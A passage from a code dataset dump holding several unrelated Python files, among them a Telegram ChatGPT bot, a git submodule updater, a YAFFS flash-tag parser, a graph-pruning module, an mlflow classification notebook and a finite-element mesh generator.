ConversationBufferMemory(memory_key=\"chat_history\", return_messages=True)\n\n # Crée la chaine de conversation basee sur le model ChatGPT\n global conversation\n conversation = LLMChain(\n llm=llm,\n prompt=prompt,\n memory=memory\n )\n\n\ndef main() -> None:\n # Charge les variables d'environnement\n load_dotenv()\n\n # Crée la chaine de conversation\n setup_conversation()\n\n # Crée l'application avec le token Telegram\n application = Application.builder().token(os.environ[\"TELEGRAM_TOKEN\"]).build()\n\n # Gere les messages entrants (autre que des commandes)\n application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, on_messages))\n application.add_handler(MessageHandler(filters.VOICE & ~filters.COMMAND, on_voices))\n\n # Fait tourner le bot à l'infini\n application.run_polling(allowed_updates=Update.ALL_TYPES)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Gamma-Software/ChatGPTVoiceTelegramBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73268630272","text":"import sys, os, subprocess, re\n\ndef trim(line):\n line = line.replace('\\t', '')\n line = line.replace('\\n', '')\n line = line.replace(' ', '')\n return line\n\ndef makeAbsolute(currentDir, relitaveDir):\n return os.path.join(currentDir, relitaveDir)\n\ndef checkUrl(url):\n matchObj = re.match(\"[a-zA-Z0-9:/.]+\", url)\n if (matchObj != None):\n return url\n return None\n\ndef checkBranch(branch):\n matchObj = re.match(\"[a-zA-Z0-9.]+\", branch)\n if (matchObj != None):\n return branch\n return None\n\ndef checkShallow(shallow):\n if (shallow == \"true\" or shallow == \"false\"):\n return shallow\n return None\n\ndef execProgram(args):\n subprocess.call(args.split(' '))\n\n\ndef changeDirectory(directory):\n\n try:\n os.chdir(directory)\n val = os.getcwd()\n directory = directory.replace('\\\\', '/')\n val = val.replace('\\\\', '/')\n return directory == val;\n except:\n pass\n return False\n\n\ndef collectModules(currentDir, gitModulesFile):\n moduleDict = {}\n \n file = open(makeAbsolute(currentDir, gitModulesFile), mode = 'r')\n lines = file.readlines()\n file.close()\n\n # this assumes that variables come after the path\n moduleName = None\n\n for line in lines:\n line = trim(line)\n subModuleCode = \"[submodule\\\"\"\n if (line.startswith(subModuleCode)):\n moduleName = line[len(subModuleCode):-2]\n moduleDict[moduleName] = {}\n variableDict = moduleDict[moduleName]\n variableDict['hasUrl'] = False;\n\n elif (moduleName != None): \n # exclude everything before \n variableDict = moduleDict[moduleName]\n \n if (line.find(\"url=\") != -1):\n variableDict[\"url\"] = checkUrl(line.replace(\"url=\", ''))\n variableDict['hasUrl'] = True;\n elif (line.find(\"branch=\") != -1):\n variableDict[\"branch\"] = checkBranch(line.replace(\"branch=\", ''))\n elif (line.find(\"shallow=\") != -1):\n variableDict[\"shallow\"] = checkShallow(line.replace(\"shallow=\", ''))\n elif (line.find(\"path=\") != -1):\n moduleDirectory = line.replace(\"path=\", '')\n absPath = None\n if (os.path.isabs(moduleDirectory)):\n absPath = moduleDirectory\n else:\n absPath = makeAbsolute(currentDir, moduleDirectory)\n\n if (os.path.isdir(absPath)):\n variableDict[\"path\"] = absPath\n else:\n if (len(line) > 0):\n print(\"unhandled line: \", line)\n\n\n for key in moduleDict.keys():\n module = moduleDict[key]\n if (module.get(\"hasUrl\", False) == False):\n print(\"unable to determine the url for the module:\", key)\n\n return moduleDict\n\n\ndef initModules():\n # this is meant to be called from the same directory\n # as the module script.\n\n execProgram(\"git submodule init\")\n execProgram(\"git submodule update --init --merge\")\n\ndef updateModules(currentDir, moduleDict):\n\n for key in moduleDict.keys():\n module = moduleDict[key]\n\n path = module.get(\"path\", None)\n branch = module.get(\"branch\", None)\n shallow = module.get(\"shallow\", None)\n url = module.get(\"url\", None)\n\n if (path != None):\n if (not os.path.isdir(path)): \n print(\"could not determine the directory for the \"\n \"supplied path:\",path);\n continue\n\n if (url == None): \n continue\n\n if (not changeDirectory(path)):\n print(\"could not switch directory \"\n \"to the module at the supplied path:\",path);\n continue\n\n branchStr = \"master\"\n if (branch != None): \n branchStr = branch\n\n shallowValue = False\n if (shallow != None):\n shallowValue= (shallow == 'true')\n\n if (shallowValue == False):\n print(\"git checkout\", branchStr)\n execProgram(\"git checkout %s\"%branchStr)\n print(\"git pull\")\n execProgram(\"git pull\")\n else:\n print(\"git clone\", \"-f -B \", branchStr)\n execProgram(\"git checkout -f -B %s\"%branchStr)\n print(\"git pull\", url, branchStr)\n execProgram(\"git pull %s %s\"%(url, branchStr))\n\ndef main():\n currentDir = os.getcwd()\n gitModulesFile = os.path.abspath(\".gitmodules\")\n\n if (not os.path.isfile(gitModulesFile)):\n print(\"No .gitmodule found in\", currentDir, \"\\nNothing to update...\")\n return\n\n moduleDict = collectModules(currentDir, gitModulesFile)\n\n initModules()\n updateModules(currentDir, moduleDict)\n changeDirectory(currentDir)\n\n\n\nif __name__== '__main__':\n main()","repo_name":"csparks78/Jam","sub_path":"gitupdate.py","file_name":"gitupdate.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"329158108","text":"from collections import defaultdict\nfrom grams.algorithm.data_graph.dg_config import DGConfigs\nimport networkx as nx\nfrom typing import Dict, List, Optional, Tuple, TypedDict, Union, cast\n\nfrom functools import cmp_to_key\nfrom grams.algorithm.data_graph.dg_graph import (\n CellNode,\n DGEdge,\n DGGraph,\n DGNode,\n EdgeFlowSource,\n EdgeFlowTarget,\n EntityValueNode,\n FlowProvenance,\n LinkGenMethod,\n LiteralValueNode,\n StatementNode,\n)\nfrom graph.retworkx import digraph_all_simple_paths\n\n\nclass DGPruning:\n NxDGEdgeAttr = TypedDict(\"NxDGEdgeAttr\", data=DGEdge)\n NxDGEdge = Tuple[str, str, str, NxDGEdgeAttr]\n\n def __init__(self, dg: DGGraph):\n self.dg = dg\n\n def prune_hidden_entities(self):\n \"\"\"Prune redundant KG entities, which added to the graph via KG discovering and from the context.\n\n **Step 1:**\n Let:\n - n be an entity node in DG.\n - v is a node connected from n via a property: LEG2: n -> p -> s -> p' -> v, and s does not have other property/qualifier rather than p'\n\n We made the following heuristics:\n * If there is no other node connect to n, then n is a root node and is from the context. We should not\n prune this node, so just skip it.\n * For all another node ui in U that connects to n via the path: LEG1: ui -> pi -> s' -> pi' -> n, if there is always a better\n path LEG* between ui and v, then we can remove the path LEG2. U contains nodes in cells or context, otherwise\n ui will be an entity to entity that won't be in the final model anyway.\n Note: LEG* is better than LEG2 when it's shorter, also from wikidata link or if not, it must have better match confidence (i.e., better provenance)\n\n **Step 2:** (?) this is questionable -- controlled by PRUNE_SINGLE_LEAF_ENT flag\n Let n' be an entity node in DG that do not link to other nodes (v doesn't exist).\n We have the following heuristics:\n * If there is no other node connect to it, this is a standable node and should be removed\n * For any node ui that connects to n via the path: LEG1: ui -> pi -> s' -> pi' -> n. If s' doesn't have other properties/qualifiers,\n then we can remove LEG1.\n\n **Step 3:**\n Let n be an entity/literal node in DG (not from cells & context)\n * If there is only one entity node u that connects to n via the path: LEG1: u -> p -> s -> p' -> n, then we can remove n. If that renders the\n statement s without value, we will remove s as well.\n\n **Step 3:**\n Finally, if a node is standalone, we should remove it.\n \"\"\"\n # step 1: prune the second leg paths\n legprime: Dict[Tuple[str, str], Optional[FlowProvenance]] = {}\n rm_legs: List[Tuple[str, EdgeFlowSource, EdgeFlowTarget]] = []\n for n in self.dg.iter_nodes():\n if not isinstance(n, EntityValueNode):\n continue\n\n if self.dg.in_degree(n.id) == 0:\n # no other node connect to it\n continue\n\n # get list of grandpa ui (only cells or values in the context), along with their paths to node n.\n grandpa = set()\n for gp in self.iter_grand_parents(n.id):\n if isinstance(gp, CellNode) or (\n isinstance(gp, (EntityValueNode, LiteralValueNode))\n and gp.is_context\n ):\n grandpa.add(gp.id)\n\n # for _, sid, ns_eid in self.dg.out_edges(nid, keys=True):\n # stmt: StatementNode = self.dg.nodes[sid][\"data\"]\n for ns_edge in self.dg.out_edges(n.id):\n stmt = self.dg.get_node(ns_edge.target)\n assert isinstance(stmt, StatementNode)\n stmt_outedges = self.dg.out_edges(stmt.id)\n if len(stmt_outedges) > 1:\n # this stmt has other qualifiers, so it's not what we are looking for\n continue\n\n for sv_outedge in stmt_outedges:\n v = self.dg.get_node(sv_outedge.target)\n # got leg 2, now looks for all incoming\n leg2 = (\n EdgeFlowSource(n.id, ns_edge.predicate),\n EdgeFlowTarget(v.id, sv_outedge.predicate),\n )\n if not stmt.has_flow(*leg2):\n continue\n leg2_provenance = stmt.get_provenance(*leg2)\n\n has_better_paths = True\n for gpid in grandpa:\n if (gpid, v.id) not in legprime:\n paths = [\n (\n cast(\n StatementNode, self.dg.get_node(path[0].target)\n ),\n EdgeFlowSource(path[0].source, path[0].predicate),\n EdgeFlowTarget(path[1].target, path[1].predicate),\n )\n for path in digraph_all_simple_paths(\n self.dg,\n gpid,\n v.id,\n cutoff=2,\n )\n ]\n provs = [\n prov\n for s, sf, tf in paths\n if s.has_flow(sf, tf)\n for prov in s.get_provenance(sf, tf)\n ]\n if len(provs) == 0:\n legprime[gpid, v.id] = None\n else:\n legprime[gpid, v.id] = max(\n provs,\n key=cmp_to_key(\n self.specific_pruning_provenance_cmp\n ),\n )\n best_prov = legprime[gpid, v.id]\n if (\n best_prov is None\n or max(\n self.specific_pruning_provenance_cmp(\n best_prov, leg2_prov\n )\n for leg2_prov in leg2_provenance\n )\n < 0\n ):\n # no better path\n has_better_paths = False\n break\n\n if has_better_paths:\n rm_legs.append((stmt.id, leg2[0], leg2[1]))\n\n # logger.info(\"#legs: {}\", len(rm_legs))\n self.remove_flow(rm_legs)\n # logger.info(\"# 0-indegree: {}\", sum(self.dg.in_degree(uid) == 0 for uid in self.dg.nodes))\n # logger.info(\"# 0-outdegree: {}\", sum(self.dg.out_degree(uid) == 0 for uid in self.dg.nodes))\n # logger.info(\"# 0-standalone: {}\",\n # sum(self.dg.out_degree(uid) + self.dg.in_degree(uid) == 0 for uid in self.dg.nodes))\n\n # step 2: prune the first leg paths (temporary disable)\n if DGConfigs.PRUNE_SINGLE_LEAF_ENT:\n rm_legs: List[Tuple[str, EdgeFlowSource, EdgeFlowTarget]] = []\n for n in self.dg.iter_nodes():\n if not isinstance(n, EntityValueNode) or self.dg.out_degree(n.id) > 0:\n continue\n\n for sn_edge in self.dg.in_edges(n.id):\n if self.dg.out_degree(sn_edge.source) == 1:\n # stmt does not have other property/qualifier\n target_flow = EdgeFlowTarget(n.id, sn_edge.predicate)\n stmt = self.dg.get_node(sn_edge.source)\n assert isinstance(stmt, StatementNode)\n for source_flow, _ in stmt.iter_source_flow(target_flow):\n rm_legs.append((sn_edge.source, source_flow, target_flow))\n self.remove_flow(rm_legs)\n\n rm_legs: List[Tuple[str, EdgeFlowSource, EdgeFlowTarget]] = []\n # step 3\n for n in self.dg.iter_nodes():\n if (\n not isinstance(n, (EntityValueNode, LiteralValueNode))\n or self.dg.out_degree(n.id) > 0\n or n.is_context\n ):\n continue\n # for sid, _, sn_eid, sn_edata in self.dg.in_edges(nid, data=True, keys=True):\n for sn_edge in self.dg.in_edges(n.id):\n # for uid, _, us_eid in self.dg.in_edges(sn_edge.source):\n for us_edge in self.dg.in_edges(sn_edge.source):\n if isinstance(self.dg.get_node(us_edge.source), EntityValueNode):\n # two consecutive entity nodes, we can remove this link\n stmt = self.dg.get_node(sn_edge.source)\n assert isinstance(stmt, StatementNode)\n if us_edge.predicate == sn_edge.predicate:\n # the link we are going to remove is the statement value, so we should remove the statement\n for source_flow, target_flow in stmt.flow:\n rm_legs.append((stmt.id, source_flow, target_flow))\n else:\n target_flow = EdgeFlowTarget(n.id, sn_edge.predicate)\n for source_flow, _ in stmt.iter_source_flow(target_flow):\n rm_legs.append((stmt.id, source_flow, target_flow))\n\n # logger.info(\"#legs: {}\", len(rm_legs))\n self.remove_flow(rm_legs)\n # logger.info(\"# 0-indegree: {}\", sum(self.dg.in_degree(uid) == 0 for uid in self.dg.nodes))\n # logger.info(\"# 0-outdegree: {}\", sum(self.dg.out_degree(uid) == 0 for uid in self.dg.nodes))\n # logger.info(\"# 0-standalone: {}\",\n # sum(self.dg.out_degree(uid) + self.dg.in_degree(uid) == 0 for uid in self.dg.nodes))\n self.prune_disconnected_nodes()\n\n def prune_disconnected_nodes(self):\n \"\"\"This function prune out disconnected nodes that are:\n 1. nodes without incoming edges and outgoing edges\n 2. statement nodes with no incoming edges or no outgoing edges\n\n Returns\n -------\n \"\"\"\n rm_nodes = set()\n for u in self.dg.iter_nodes():\n if isinstance(u, EntityValueNode):\n if self.dg.in_degree(u.id) == 0 and self.dg.out_degree(u.id) == 0:\n rm_nodes.add(u.id)\n elif isinstance(u, StatementNode):\n if self.dg.in_degree(u.id) == 0 or self.dg.out_degree(u.id) == 0:\n rm_nodes.add(u.id)\n for uid in rm_nodes:\n self.dg.remove_node(uid)\n\n def remove_flow(self, flows: List[Tuple[str, EdgeFlowSource, EdgeFlowTarget]]):\n for sid, source_flow, target_flow in flows:\n stmt = cast(StatementNode, self.dg.get_node(sid))\n stmt.untrack_flow(source_flow, target_flow)\n if not stmt.has_source_flow(source_flow):\n self.dg.remove_edge_between_nodes(\n source_flow.source_id, sid, source_flow.edge_id\n )\n if not stmt.has_target_flow(target_flow):\n self.dg.remove_edge_between_nodes(\n sid, target_flow.target_id, target_flow.edge_id\n )\n\n def specific_pruning_provenance_cmp(\n self, prov0: FlowProvenance, prov1: FlowProvenance\n ) -> int:\n # compare provenance, this function only accept\n if prov0.gen_method == LinkGenMethod.FromWikidataLink:\n # always favour from wikidata link\n return 1\n if prov1.gen_method == LinkGenMethod.FromWikidataLink:\n return -1\n # assert prov0.gen_method == prov1.gen_method and prov0.gen_method_arg == prov1.gen_method_arg\n # do not need to check if the two gen method and args are equal, as even if we select the incorrect one\n # we only truncate when the other leg worst than it\n return prov0.prob - prov1.prob # type: ignore\n\n def iter_grand_parents(self, nid: str):\n for parent in self.dg.predecessors(nid):\n for grand_parent in self.dg.predecessors(parent.id):\n yield grand_parent\n\n # def out_edges(self, uid: str) -> Dict[str, List[DGEdge]]:\n # label2edges = defaultdict(list)\n # for _, vid, eid, edata in self.dg.out_edges(uid, data=True, keys=True):\n # label2edges[eid].append(edata[\"data\"])\n # return label2edges\n","repo_name":"usc-isi-i2/GRAMS","sub_path":"grams/algorithm/data_graph/dg_pruning.py","file_name":"dg_pruning.py","file_ext":"py","file_size_in_byte":12814,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"36834612632","text":"# %%\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2, mutual_info_classif\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix, classification_report\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sys\nimport mlflow\n\n# %%\nmobile = pd.read_csv('mobile.csv')\nmobile.head(3)\n\n# %%\nplt.figure(figsize=(10,10))\nsns.countplot(mobile)\n\n# %%\ndst_mob=mobile.select_dtypes(exclude='object')\ndst_mob\n\n# %%\nmobile.info()\n\n# %%\nplt.hist(mobile.price_range)\n\n# %%\nsns.distplot(mobile.price_range)\n\n# %%\nmobile.shape\n\n# %%\nmobile.nunique()\n\n# %%\nmobile.columns\n\n# %%\nX = mobile.iloc[:,:-1]\ny = mobile.iloc[:,-1]\n\n# %%\nX.shape\n\n# %%\ny.head(3)\n\n# %% [markdown]\n# # Feature selection based on Kbest using chi2\n\n# %%\nbest_features_score = SelectKBest(score_func=chi2, k=10)\nbest_features_score.fit(X,y)\nbest_features = pd.DataFrame(best_features_score.scores_, columns = ['score'])\nbest_features\nXcols = pd.DataFrame(X.columns, columns = ['Feature_name'])\nbest_scores = pd.concat([Xcols, best_features], axis=1)\nbest_scores\n\n# %% [markdown]\n# #Top 10 best feature score\n\n# %%\nbest_scores.nlargest(10,'score')\n\n# %%\n#train and TEst ata splits\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.3, random_state=124)\n\n# %%\n#Scaling the Feature\nscaler = StandardScaler()\nmob_scaled=scaler.fit_transform(X)\nmob_scaled\n\n# %%\nX_train, X_test, y_train, y_test = train_test_split(mob_scaled,y, test_size=0.3, random_state=124)\n\n# %%\n#Model Selection\nmodel_lr_mob = LogisticRegression()\nmodel_lr_mob_scaled = LogisticRegression()\nmodel_dt_mob = DecisionTreeClassifier()\nmodel_rf_mob = RandomForestClassifier()\n\n# %%\npipe_lr = Pipeline([('Standard Scaler', StandardScaler(), LogisticRegression())])\n\n# %% [markdown]\n# #ML FLOW INTEGRATION\n# \n\n# %%\n#Setting up experiment using MLFOW\nmlflow.set_experiment(\"Classification Experiment\")\nmlflow.sklearn.autolog()\n\n# %%\n# Experiment with logistic regression Algorithm with standard scaler scaled value\nwith mlflow.start_run(run_name=\"Scaled Logistic regression\") as run:\n model_lr_mob_scaled.fit(X_train,y_train)\n predslr = model_lr_mob_scaled.predict(X_test)\n\n# %%\nprint(\"Logistic Regression with scaled value Model Training and Test Score Below :\")\nprint(\"Model Score on Training data :\",model_lr_mob_scaled.score(X_train, y_train))\nprint(\"Model Score on Test Data: \", model_lr_mob_scaled.score(X_test, y_test))\n\n# %%\n# Experiment with logistic regression Algorithm with out scaling\nwith mlflow.start_run(run_name=\"Logistic regression\") as run:\n model_lr_mob.fit(X_train,y_train)\n predslr = model_lr_mob.predict(X_test)\n\n# %%\nprint(\"Logistic Regression model Training and Test Score Below :\")\nprint(\"Model Score on Training data :\",model_lr_mob.score(X_train, y_train))\nprint(\"Model Score on Test Data: \", model_lr_mob.score(X_test, y_test))\n\n# %%\n# Experiment with Decisioin Tree Classifier Algorithm with out scaling\nwith mlflow.start_run(run_name=\"Decisioin Tree Classifier\") as run:\n model_dt_mob.fit(X_train,y_train)\n preds_dt = model_dt_mob.predict(X_test)\n\n# %%\nprint(\"Decision Treee Classifier Training and Test Score Below :\")\nprint(\"Model Score on Training data :\",model_dt_mob.score(X_train, y_train))\nprint(\"Model Score on Test Data: \", model_dt_mob.score(X_test, y_test))\n\n# %%\n# Experiment with Random Forest classifier Algorithm with out scaling\nwith mlflow.start_run(run_name=\"Random Forest classifier\") as run:\n model_rf_mob.fit(X_train,y_train)\n preds_rf = model_rf_mob.predict(X_test)\n\n# %%\nprint(\"Random Forest Classifier Training and Test Score Below :\")\nprint(\"Model Score on Training data :\",model_rf_mob.score(X_train, y_train))\nprint(\"Model Score on Test Data: \", model_rf_mob.score(X_test, y_test))\n\n\n","repo_name":"bizsuresh/DSprojects","sub_path":"mob_class.py","file_name":"mob_class.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35637697138","text":"import wikipedia as wiki\n#h=\"https://en.wikipedia.org/wiki/\"\nh=\"\"\nfor j in range(49,55):\n file=open(\"url1000_0\"+str(j)+\".dat\",\"w\")\n for num in range(1000):\n nam=wiki.random(1)\n nam=nam.replace(\" \", \"_\")\n file.write(str(h)+str(nam)+\"\\n\")\n file.close()\n \n","repo_name":"Marc-xyz/SyntaxColor","sub_path":"scraping_names_of_articles.py","file_name":"scraping_names_of_articles.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35395344279","text":"\"\"\"\nCreates the base test to be used as a starting point for all\nintegration tests.\n\nThis should be the parent class to each non-unit test.\nIt allows for instantiation of the database dynamically\nand makes sure that it is a new, blank database each time.\n\nClasses:\n--------\n None\n\nFunctions:\n----------\n override_get_db():\n overrides the default db session with the test instance\n\nMisc Variables:\n--------------\n SQLALCHEMY_DATABASE_URL: str\n the default test db url\n engine: Session\n the test db session\n\"\"\"\nimport sqlalchemy\n\nfrom sqlalchemy.orm import sessionmaker\nfrom fastapi.testclient import TestClient\n\nfrom app.main import app\nfrom app.database import Base, get_db\n\nSQLALCHEMY_DATABASE_URL = \"sqlite:///./test.db\"\n\nengine = sqlalchemy.create_engine(\n url=SQLALCHEMY_DATABASE_URL, connect_args={\"check_same_thread\": False}\n)\n\nTestingSessionLocal = sessionmaker(\n autocommit=False, autoflush=False, bind=engine)\n\n\nBase.metadata.drop_all(bind=engine)\nBase.metadata.create_all(bind=engine)\n\n\ndef override_get_db():\n try:\n db = TestingSessionLocal()\n yield db\n finally:\n db.close()\n\n\napp.dependency_overrides[get_db] = override_get_db\n\ndb = TestingSessionLocal()\nclient = TestClient(app=app)\n","repo_name":"Gichia/fast-api-starter","sub_path":"app/tests/base_test.py","file_name":"base_test.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28749048295","text":"import time\r\nimport random\r\n\r\n\r\nclass Robot:\r\n\r\n\r\n def __init__(self, name, colour):\r\n self.colour = colour\r\n self.name = name\r\n \r\n def start(self,):\r\n print(\"Hello!Please wait the boot is loading it may take few seconds.....\")\r\n def shutdown(self,):\r\n print(\"I am off now so good bye and have great day...\")\r\n def clean(self,):\r\n option = input(\"do you want me to clean the place?: \")\r\n if option == \"yes\":\r\n print(\"I am cleaning \")\r\n else:\r\n print(\"Thats fine\")\r\n\r\n def news(self,):\r\n op2 = str(input()).lower()\r\n set = [\"tell me the news\", \"what is the news\"]\r\n if op2 in set:\r\n print(\"Today's news is xyz...\")\r\n else:\r\n print(\"cannot understand\")\r\n def times(self,):\r\n op3 = input().lower()\r\n set2 = [\"what is the time\", \"tell me the time\"]\r\n if op3 in set2:\r\n print(time.ctime())\r\n else:\r\n print(\"cannot understand\")\r\n\r\n temp = random.randint(0, 50)\r\n def temperature(self,):\r\n if self.temp > 40:\r\n print(\"I am overheated!\")\r\n else:\r\n self.temp = random.randint(0, 50)\r\n battery = random.randint(0, 100)\r\n def power(self,):\r\n if self.battery < 20:\r\n print(\"Low battery power!Please charge\")\r\n else:\r\n self.battery = random.randint(0, 100)\r\n speed = random.randint(0, 40)\r\n def acceleration(self,):\r\n if self.speed > 20:\r\n print(\"My speed has increased : \"+str(self.speed))\r\n else:\r\n self.speed = random.randint(0, 40)\r\nbot = Robot(\"dora\", \"black\")\r\nbot.start()\r\nbot.acceleration()\r\nbot.temperature()\r\nbot.clean()\r\nbot.power()\r\nbot.news()\r\nbot.times()\r\nbot.shutdown()\r\n","repo_name":"AnshulMurnal/Pydev","sub_path":"ROBOT.py","file_name":"ROBOT.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12497889494","text":"import struct;\n\nclass YaffsOobTag:\n \"\"\"\n oobBytes should be the raw bytes of the out of band area of NAND.\n \"\"\"\n\n def __init__(self, oobBytes=None, tag_offset=1):\n if oobBytes is None:\n return\n\n #Reference to the parent block class for this Oobtag.\n self.block_cls = None\n self.tag_offset = tag_offset\n\n # The Layout of the oob is not controlled entirely by Yaffs so\n # the specific offsets for these fields may be different for different\n # phones.\n (self.block_seq,\n self.object_id,\n self.chunk_id,\n self.num_bytes) = struct.unpack(\"> 24\n \n #self.isBadBlock = (self.block_status != '\\xff')\n \n self.isHeaderTag = (topByte == 0x80 or topByte == 0xC0)\n self.is_shrink_header = (topByte == 0xC0)\n \n #The top byte in objectId field is overloaded in the header tag\n # to denote the type of object. We need to mask that out\n if self.isHeaderTag:\n self.object_id &= 0x00ffffff\n self.chunk_id = 0\n \n #erased or empty block\n self.is_erased = (self.block_seq == 0xffffffff)\n \n #non-empty block, but the object has been deleted\n self.isDeleted = (self.chunk_id == 0xc0000004)\n\n #This field is set by the Yaffs Object upon\n # reconstruction of the different versions.\n #It denotes that this chunk is used by the most recent\n #version of the Yaffs object.\n self.is_most_recent = False\n\n\n def __str__(self):\n return 'Block Seq: %d, Object Id: %d, Chunk Id: %d, Num. Bytes: %d' \\\n % (self.block_seq, self.object_id, self.chunk_id, self.num_bytes)","repo_name":"rjwalls/YaffsParser","sub_path":"YaffsClasses/YaffsOobTag.py","file_name":"YaffsOobTag.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"71908598590","text":"from tqdm.contrib.concurrent import process_map\nfrom multiprocessing import Manager\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.tri as mtri\nimport time\nimport os\n\nimport scipy.spatial as spsa\nimport scipy.sparse as sp\nfrom scipy.sparse.linalg import spsolve as solver\n\n#plottefunksjon for punkter\ndef plotPoints(p):\n for point in p:\n plt.plot(point[0],point[1],'ro',markersize=3)\n\n#plottefunksjon for elementer\ndef plotElements(p,elements):\n for el in elements:\n #Q1 elements\n connectPoints(p[el[0][0]],p[el[0][1]])\n connectPoints(p[el[0][1]],p[el[0][3]])\n connectPoints(p[el[0][3]],p[el[0][2]])\n connectPoints(p[el[0][2]],p[el[0][0]])\n #Q2 elements (only visible part)\n connectPoints(p[el[1][4]],p[el[1][1]],color = 'orange')\n connectPoints(p[el[1][4]],p[el[1][3]],color = 'orange')\n connectPoints(p[el[1][4]],p[el[1][5]],color = 'orange')\n connectPoints(p[el[1][4]],p[el[1][7]],color = 'orange')\n\n#hjelpefunksjon\ndef connectPoints(a,b,color = 'darkviolet'):\n a1, a2 = a[0], a[1]\n b1, b2 =b[0], b[1]\n plt.plot([a1,b1],[a2,b2], color, marker='',linewidth =.5)\n\n#plottefunksjon for kanter\ndef plotEdges(inputEdge,p):\n for edge in inputEdge:\n connectPoints(p[int(edge[0])],p[int(edge[1])],color = 'r') \n\ndef halfCircleMeshMaker(x0,x1,y0,y1 = np.inf, Nr = 1,edgepoints = False):\n r = (x1 - x0)/2\n rpart = r/Nr\n rlist = np.asarray([rpart*n for n in range(1,Nr+1)])\n Nlist = [n for n in range(1,Nr+1)]\n px = [x0+r]\n py = [y0]\n count = 0\n flatedge = [0]\n curvededge = []\n for rad,num in zip(rlist,Nlist):\n thetalist = np.linspace(0,np.pi,4*num+1)\n for theta in thetalist:\n if num == Nr:\n curvededge.append(count+1)\n if theta == np.pi or theta == 0:\n flatedge.append(count+1)\n px.append(px[0]+np.cos(theta)*rad)\n py.append(py[0] +np.sin(theta)*rad)\n count += 1\n\n px = np.asarray(px)\n py = np.asarray(py)\n p = np.vstack((px,py))\n mesh = spsa.Delaunay(p.T)\n if y1 != np.inf:\n py = (py - y0)*((y1-y0)/r) + y0\n p = np.vstack((px,py))\n sortflatedge = np.concatenate((flatedge[-1::-2],flatedge[1::2]),axis=0)\n\n edgepts = np.concatenate((sortflatedge[:-1],curvededge))\n edge = np.zeros((len(edgepts)-1,2))\n for i in range(len(edgepts)-1):\n edge[i][0] = int(edgepts[i])\n edge[i][1] = int(edgepts[i+1])\n if edgepoints:\n return p.T, mesh.simplices, edge, sortflatedge, curvededge\n else:\n return p.T, mesh.simplices,edge\n\ndef meshMaker(x0, x1, y0, y1, N, M,edgepoints = False):\n Lx = np.linspace(x0,x1,N+1)\n Ly = np.linspace(y0,y1,M+1)\n ax,ay = np.meshgrid(Lx,Ly)\n\n Ax = ax.ravel()\n Ay = ay.ravel()\n\n bp = np.vstack((Ax, Ay)).T\n\n mesh = spsa.Delaunay(bp)\n south = []\n east = []\n west = []\n north = []\n count = 0\n for point in bp:\n if point[1] == y0:\n south.append(count)\n if point[1] == y1:\n north.append(count)\n if point[0] == x0:\n west.append(count)\n if point[0] == x1:\n east.append(count)\n count += 1\n north = np.flip(north)\n west = np.flip(west)\n\n edgepts = np.concatenate((south,east[1:],north[1:],west[1:]),axis = 0)\n edge = np.zeros((len(edgepts)-1,2))\n for i in range(len(edgepts)-1):\n edge[i][0] = int(edgepts[i])\n edge[i][1] = int(edgepts[i+1])\n \n if edgepoints:\n return bp, mesh.simplices, edge, south, east, np.flip(north), np.flip(west)\n\n return bp, mesh.simplices, edge\n\ndef nodeReplacer(p1,p2,edge,mesh):\n indexes = np.asarray([i for i in range(len(p2))])\n inverses = indexes[~np.isin(np.arange(indexes.size), edge)]\n replacepoints =p2[edge]\n p2 = p2[inverses]\n tol = 10E-10 \n\n for count,inv in enumerate(inverses):\n mesh = [[count + len(p1) if x == inv else x for x in sub] for sub in mesh]\n\n for count,point in enumerate(p1):\n for replace,index in zip(replacepoints,edge):\n if point[0] - tol < replace[0] < point[0] + tol and point[1] - tol < replace[1] < point[1] + tol:\n mesh = [[count if x == index else x for x in sub] for sub in mesh]\n \n mesh = np.asarray(mesh)\n p2 = np.asarray(p2)\n return p2, mesh\n\ndef domainCreator(halfcircles=1, rectangles=0,resolution=1,circleheight =1, rectangleheight = 1):\n tol = 10E-10\n length = 1/5 + (3*(halfcircles + rectangles))/5\n N = int(length*10*resolution)\n M = int(4*resolution)\n p,mesh,edge,south,east,north,west = meshMaker(0,length,.5,.7,N,M,edgepoints = True)\n position = 0.2\n circleheight *= 0.2\n rectangleheight *= 0.2\n\n while halfcircles != 0:\n newp, newmesh, edge, flat, curve = halfCircleMeshMaker(position,position +.4,.7,y1 = .7 + circleheight, Nr = int(2*resolution),edgepoints = True)\n newp, newmesh = nodeReplacer(p,newp,flat,newmesh)\n p = 